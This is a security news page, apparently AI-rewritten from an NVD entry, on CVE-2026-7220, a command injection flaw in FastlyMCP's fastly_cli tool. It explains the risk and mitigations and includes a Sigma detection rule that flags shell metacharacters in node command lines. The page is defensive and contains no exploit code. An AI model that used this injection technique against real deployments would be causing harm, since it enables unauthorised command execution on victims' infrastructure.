CVE-2026-7220: FastlyMCP Command Injection Exposes Infrastructure
The National Vulnerability Database (NVD) has detailed CVE-2026-7220, a high-severity OS command injection vulnerability in jackwrichards FastlyMCP, affecting versions up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620. This flaw, residing in the fastly-mcp.mjs file’s fastly_cli Tool component, allows remote attackers to execute arbitrary OS commands by manipulating the command argument.
This isn’t a theoretical risk; the exploit is public. The project utilizes a rolling release model, meaning specific affected or patched version numbers aren’t available, complicating defensive efforts. While the project was informed via an issue report, no response has been made, leaving users in the dark and exposed. The CVSSv3.1 score of 7.3 (High) reflects the critical nature, with network attack vector and no required privileges or user interaction.
Attackers will leverage this for initial access or privilege escalation on systems managing Fastly configurations. The lack of a clear patch path due to the rolling release model is a significant operational challenge. Defenders must assume this vulnerability is actively exploitable and assess their exposure immediately.
What This Means For You
- If your operations rely on jackwrichards FastlyMCP, you are at direct risk. This is a command injection flaw with a public exploit and no clear patch. You need to identify all instances of this tool in your environment and evaluate immediate mitigation strategies, such as network segmentation, restricting execution privileges, or discontinuing its use until a fix is verified. Attackers will use this to pivot into your Fastly-managed infrastructure.
Related ATT&CK Techniques
🛡️ Detection Rules
3 rules · 6 SIEM formats3 detection rules auto-generated for this incident, mapped to MITRE ATT&CK. Sigma YAML is free — export to any SIEM format via the Intel Bot.
CVE-2026-7220: FastlyMCP Command Injection via 'command' argument
title: CVE-2026-7220: FastlyMCP Command Injection via 'command' argument
id: scw-2026-04-28-ai-1
status: experimental
level: high
description: |
Detects the execution of the FastlyMCP tool with command injection attempts. The vulnerability CVE-2026-7220 in fastly-mcp.mjs allows for OS command injection by manipulating the 'command' argument. This rule specifically looks for the node process running fastly-mcp and common command injection characters within the command line, indicating an attempt to exploit this vulnerability.
author: SCW Feed Engine (AI-generated)
date: 2026-04-28
references:
- https://shimiscyberworld.com/posts/nvd-CVE-2026-7220/
tags:
- attack.execution
- attack.t1059.004
logsource:
category: process_creation
detection:
selection:
Image|startswith:
- '/usr/local/bin/node'
CommandLine|contains:
- 'fastly-mcp'
- 'command'
CommandLine|contains:
- '&&'
- ';'
- '|'
- '`'
- '$()'
condition: selection
falsepositives:
- Legitimate administrative activity
Source: Shimi's Cyber World · License & reuse
Indicators of Compromise
| ID | Type | Indicator |
|---|---|---|
| CVE-2026-7220 | Command Injection | jackwrichards FastlyMCP up to commit 6f3d0b0e654fc51076badc7fa16c03c461f95620 |
| CVE-2026-7220 | Command Injection | File: fastly-mcp.mjs |
| CVE-2026-7220 | Command Injection | Component: fastly_cli Tool |
| CVE-2026-7220 | Command Injection | Manipulation of argument 'command' |
Written by SCW Vulnerability Desk
Source & Attribution
| Source Platform | NVD |
| Channel | National Vulnerability Database |
| Published | April 28, 2026 at 07:16 UTC |
This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.
Believe this infringes your rights? Submit a takedown request.
Related coverage
CVE-2026-7223: BigSweetPotatoStudio HyperChat SSRF Vulnerability
CVE-2026-7223 — A vulnerability was identified in BigSweetPotatoStudio HyperChat up to 2.0.0-alpha.63. Affected by this issue is the function fetch of the file packages/core/src/http/aiProxyMiddleware.mts of...
TencentCloudBase CloudBase-MCP SSRF Vulnerability (CVE-2026-7221)
CVE-2026-7221 — A vulnerability was found in TencentCloudBase CloudBase-MCP up to 2.17.0. Affected is the function openUrl of the file mcp/src/interactive-server.ts of the component open-url...
Totolink N300RT: High-Severity Buffer Overflow Vulnerability (CVE-2026-7219)
CVE-2026-7219 — A flaw has been found in Totolink N300RT 3.4.0-B20250430. This affects an unknown function of the file /boafrm/formIpQoS. Executing a manipulation of the...